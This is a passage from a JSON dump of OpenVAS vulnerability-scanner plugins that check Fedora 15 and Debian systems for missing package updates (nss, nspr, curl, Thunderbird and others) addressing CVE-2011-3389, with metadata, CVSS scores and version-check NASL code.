value:\"2012-01-23 11:30:51 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for nss FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nss'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"nss on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~10.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-python2-extras FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072231.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863695\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:46 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gnome-python2-extras'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"gnome-python2-extras on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~35.fc15.4\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nss-util FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863691", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-util FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072222.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863691\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:34 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for nss-util FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nss-util'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"nss-util on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-util\", rpm:\"nss-util~3.13.1~3.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird-lightning FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863699", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863699", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird-lightning FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072223.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863699\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:55 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for thunderbird-lightning FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird-lightning'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"thunderbird-lightning on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird-lightning\", rpm:\"thunderbird-lightning~1.1~0.1.rc1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-11T11:07:52", "description": "Check for the Version of nspr", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nspr FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:863690", "href": "http://plugins.openvas.org/nasl.php?oid=863690", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nspr FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nspr on Fedora 15\";\ntag_insight = \"NSPR provides platform independence for non-GUI operating system\n facilities. These facilities include threads, thread synchronization,\n normal file and network I/O, interval timing and calendar time, basic\n memory management (malloc and free) and shared library linking.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072226.html\");\n script_id(863690);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:31 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for nspr FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nspr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.9~2.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:59", "description": "The remote host is missing an update to curl\nannounced via advisory DSA 2398-2.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2398-2 (curl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71249", "href": "http://plugins.openvas.org/nasl.php?oid=71249", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2398_2.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2398-2 (curl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"cURL is a command-line tool and library for transferring data with URL\nsyntax. It was discovered that the countermeasures against the\nDai/Rogaway chosen-plaintext attack on SSL/TLS (CVE-2011-3389,\nBEAST) cause interoperability issues with some server\nimplementations. This update ads the the CURLOPT_SSL_OPTIONS and\nCURLSSLOPT_ALLOW_BEAST options to the library, and the\n- --ssl-allow-beast option to the curl program.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze2.\n\nWe recommend that you upgrade your curl packages.\";\ntag_summary = \"The remote host is missing an update to curl\nannounced via advisory DSA 2398-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202398-2\";\n\nif(description)\n{\n script_id(71249);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3389\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:55:40 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2398-2 (curl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"curl\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-dbg\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-gnutls\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-gnutls-dev\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-openssl-dev\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:56:33", "description": "Check for the Version of perl-Gtk2-MozEmbed", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for perl-Gtk2-MozEmbed FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:863698", "href": "http://plugins.openvas.org/nasl.php?oid=863698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Gtk2-MozEmbed FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"perl-Gtk2-MozEmbed on Fedora 15\";\ntag_insight = \"This module allows you to use the Mozilla embedding widget from Perl.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072228.html\");\n script_id(863698);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:53 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for perl-Gtk2-MozEmbed FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl-Gtk2-MozEmbed\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Gtk2-MozEmbed\", rpm:\"perl-Gtk2-MozEmbed~0.09~1.fc15.8\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nspr FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863690", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nspr FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072226.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863690\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:31 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for nspr FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nspr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"nspr on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.9~2.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for perl-Gtk2-MozEmbed FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Gtk2-MozEmbed FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072228.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863698\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:53 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for perl-Gtk2-MozEmbed FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl-Gtk2-MozEmbed'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"perl-Gtk2-MozEmbed on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Gtk2-MozEmbed\", rpm:\"perl-Gtk2-MozEmbed~0.09~1.fc15.8\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:07:14", "description": "Check for the Version of thunderbird", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-05T00:00:00", "id": 